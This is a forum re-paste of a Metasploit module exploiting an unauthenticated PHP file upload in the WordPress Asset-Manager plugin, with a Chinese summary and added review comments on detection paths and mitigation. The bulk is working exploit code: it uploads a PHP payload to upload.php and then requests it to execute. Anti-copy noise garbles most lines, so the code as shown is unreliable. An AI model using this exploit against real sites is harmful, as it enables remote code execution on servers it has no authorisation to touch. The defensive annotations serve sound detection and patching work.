这个 Metasploit 模块利用的是 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞：该插件允许上传 PHP 文件，用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
2 f6 e! a' x `4 @; X5 r
' I: H; k% J+ ?) qrequire 'msf/core'
1 p* N& Z' O1 u: C% c8 T+ @require 'msf/core/exploit/php_exe'
, [. O4 m) m4 W/ G% r0 S7 [9 c8 w
# NOTE(review): this listing is a forum re-paste with anti-copy noise interleaved on most
# lines, so the Ruby below is not loadable as-is. It is annotated here for review only;
# the noise has deliberately not been stripped or the code repaired.
#
# What the module does, as far as the visible lines show: an unauthenticated multipart
# POST carrying a "Filedata" part to wp-content/plugins/asset-manager/upload.php, followed
# by a GET of the same filename under wp-content/uploads/assets/temp/. Both paths are the
# natural web-log / WAF detection points for this issue; the uploaded name is five random
# alphabetic characters followed by ".php".
#
# Mitigation is the usual one for upload-to-webroot plugins: remove or update the plugin,
# and deny PHP execution under wp-content/uploads so that an uploaded file cannot be run.
; E2 r' h$ H2 H: vclass Metasploit3 < Msf::Exploit::Remote
5 y/ _9 R. y' ], |/ j Rank = ExcellentRanking
! B8 O7 e Z9 I5 e$ V ; Z0 A+ A' Y' K( K. Z$ P' ~1 B
include Msf::Exploit::Remote::HttpClient% ^0 y: a4 O- J% M4 K8 [
# NOTE(review): the mixin name on the next line is garbled in the paste. The require of
# 'msf/core/exploit/php_exe' above and the get_write_exec_payload call in #exploit suggest
# it is the PHP-EXE payload mixin from that file — confirm against the upstream module.
include Msf::Exploit: hpEXE, s9 q; Z( w. ^- I
6 `% i# k6 r- z# M6 `- G. F( i+ t
# Module metadata and the single TARGETURI option (the WordPress base path).
def initialize(info = {})/ U; p* ^: B' s& {& f: H3 B
super(update_info(info,, ^ z1 A( e( K/ D5 F G
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
% g, E7 e, \2 R! |& I) v 'Description' => %q{, x+ F. O8 M @, s! q0 H; T8 |
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
6 @4 e- s8 B9 e5 e( z: t# p plugin. By abusing the upload.php file, a malicious user can upload a file to a% _: k S: R( g! c% o
temp directory without authentication, which results in arbitrary code execution.
1 ]% L) z; m- Y+ Z8 @% `1 h! ^8 e },4 x( D, Y: J* Q G/ ~$ i( S
'Author' =>
2 g+ z5 a( G$ H+ c [
% S9 s- a+ X; f" E% r; f 'Sammy FORGIT', # initial discovery% l8 V S8 r" V. K' u5 _
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ m7 Z& y Z! Q- u: E: a; }, b ],
" p G( N: h" Z8 L8 C7 r. C! H 'License' => MSF_LICENSE,9 o6 t% n2 Q: ?, M" z2 o* l) f
# NOTE(review): the 'URL' entry below points at the forum that re-hosted this listing,
# not at a vendor or advisory page; treat the OSVDB / BID / EDB ids as the references.
'References' =>
0 _5 T p. w5 W$ Q: `7 [ [2 {$ F3 d5 ]& s# Q5 }
[ 'OSVDB', '82653' ],7 q' j G( S# F
[ 'BID', '53809' ],$ H9 g+ t0 m3 `( `
[ 'EDB', '18993' ],
; w7 i9 Q# A1 Q7 V [ 'URL', 'http:// www.myhack58.com /' ]% {( D4 w) x6 x G
],
9 M) M8 i( Y' D" } 'Payload' =>
% l; W) W0 A# h! {( P- U" M {
( { B# |6 N' Y. {$ R; A+ Z 'BadChars' => "\x00",# F9 V' B) Q% S" R" P) [
},% W3 L$ a5 c+ f1 [
'Platform' => 'php',
]1 l- D; l y8 l& ~ 'Arch' => ARCH_PHP,
9 s6 W7 k: \! K# i" ~" N 'Targets' =>
0 I- p, D# X/ c3 r6 P' X [ B( l/ Q4 h+ K- J) u" G
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 _* }. w( j- O& j0 G" V
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 Y; k& k" [" W5 V, d% r
],8 }8 V( ?- [, \/ h5 _. |" R* I6 {
'DefaultTarget' => 0,
% X& P) [ J4 D 'DisclosureDate' => 'May 26 2012'))# N; K& E0 b% f% ~: P' B
/ ?" ~# z( x1 T. r# j: j0 n register_options( k- Y2 I, c* W6 ^: X. ], A
[
9 p5 n% T$ l* W0 [" G$ v OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
, O+ t: J6 s( `" R. _' z ], self.class)
7 D* K* a5 {+ C end; ?+ D2 Y1 o1 e- ~/ R1 ^
# Two HTTP round trips: upload, then request the uploaded file. Raises via fail_with
# (UnexpectedReply) when the upload response is not a 200 echoing the filename, or when
# the follow-up GET returns a non-200 status.
- f* ?, a c' K( L) d def exploit0 q6 C% J8 \$ F/ I
uri = target_uri.path! K# J" ^& b" ]3 k/ W$ M
# Make sure the base path ends with '/' before the plugin paths are appended to it.
uri << '/' if uri[-1,1] != '/'
' B0 f; l& U# [& w peer = "#{rhost}:#{rport}", D7 m8 w. s1 f7 l" _0 ^" ]
# Random five-letter name with a .php extension; this is the name to look for in logs.
payload_name = "#{rand_text_alpha(5)}.php"
" G3 K: I& z1 H- _# J% M8 h php_payload = get_write_exec_payload(:unlink_self=>true): |9 D) f; S. `' e/ t1 h ?) ?
( z% D& ?0 y. M5 d" d! g% V8 M& `; S
# Single-part multipart/form-data body; the field name "Filedata" is what upload.php reads.
data = Rex::MIME::Message.new0 H ^2 B& B; X
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")4 J/ a" w7 X: ^# n
# Drops a leading CRLF before the first "--_Part_" boundary in the serialised message.
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- n. e/ \7 ?: _, q. T; w
- e* n5 C1 d* o! K print_status("#{peer} - Uploading payload #{payload_name}")& ]+ [/ W6 E/ C* c! W
res = send_request_cgi({
" R- W. r+ J- X 'method' => 'POST',
4 q* y) C- U2 \/ ?' Z7 \ 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
9 y* F/ M& f' x' n% ]* P 'ctype' => "multipart/form-data; boundary=#{data.bound}",
4 ^4 s% R# ~0 ~; n 'data' => post_data" l1 j: I1 r, @+ j3 \/ e0 _
})
9 [4 Q# J9 F# U! P. h! T
# Upload is considered successful only if the server answers 200 and echoes the filename.
# payload_name is alphabetic plus ".php", so interpolating it into the regex is safe here.
$ F7 ]. w/ a' W4 r) {! l if not res or res.code != 200 or res.body !~ /#{payload_name}/. f4 y1 m* X1 ^/ w5 { t, Z
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
' @) |0 S' ]: g3 V! m- ?# vend' d5 s. L# H, |# |; B5 D
# The uploaded file is expected under wp-content/uploads/assets/temp/ — the second
# request path worth alerting on.
$ ~- |3 w/ o$ O) J3 F print_status("#{peer} - Executing payload #{payload_name}")
9 M [0 p3 G. x' D; O+ W res = send_request_raw({
: N: n$ @. `8 O0 L4 Y/ W( n( m 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
8 H; p3 O# z$ s# r 'method' => 'GET'/ G# w7 L! s- \
})
6 v2 C3 Z2 {1 h4 S: c0 ^' P * Q' @( ?' }/ X+ i, N7 D6 v
# Unlike the upload check, a nil response is not treated as failure here — presumably
# because the request may never return once the payload runs; confirm against upstream.
if res and res.code != 200
8 T2 a+ w8 m/ g, g" ] fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
9 u# R" i' q9 D end1 X y& ?7 {. A2 l( q
end
# z2 C1 |: W nend
1 f; \ N' J8 f0 @! m |